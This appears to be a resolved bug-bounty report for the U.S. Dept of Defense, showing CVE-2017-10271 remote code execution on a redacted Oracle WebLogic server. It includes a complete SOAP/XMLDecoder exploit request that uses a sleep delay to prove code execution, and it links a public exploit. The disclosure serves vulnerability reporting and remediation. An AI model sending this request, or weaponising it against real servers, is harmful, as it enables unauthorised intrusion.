Loading HuntDB...

RCE on █████ via CVE-2017-10271

Critical
U
U.S. Dept Of Defense
Submitted None
Reported by erbbysam

Vulnerability Details

Technical details and impact analysis

Code Injection
**Summary:** Happy Friday! The server at `██████` is vulnerable to CVE-2017-10271 "Oracle WebLogic Server Remote Command Execution". **Description:** The following request takes 12 seconds (12000 milliseconds) to complete: ``` POST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1 Host: ██████████ Content-Length: 423 content-type: text/xml Accept-Encoding: gzip, deflate, compress Accept: */* <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java class="java.beans.XMLDecoder"> <object class="java.lang.Thread" method="sleep"> <long>12000</long> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ``` This proves that I have Java code execution on the remote server. ref: https://techblog.mediaservice.net/2018/07/cve-2017-10271-oracle-weblogic-server-remote-command-execution-sleep-detection-payload/ Public exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271 I was not able to use that script with a `ping` command, which might have been blocked by preventing outbound connections. ## Suggested Mitigation/Remediation Actions Patch & possibly don't allow external access. ## Impact Critical, RCE.

Related CVEs

Associated Common Vulnerabilities and Exposures

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover …

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Code Injection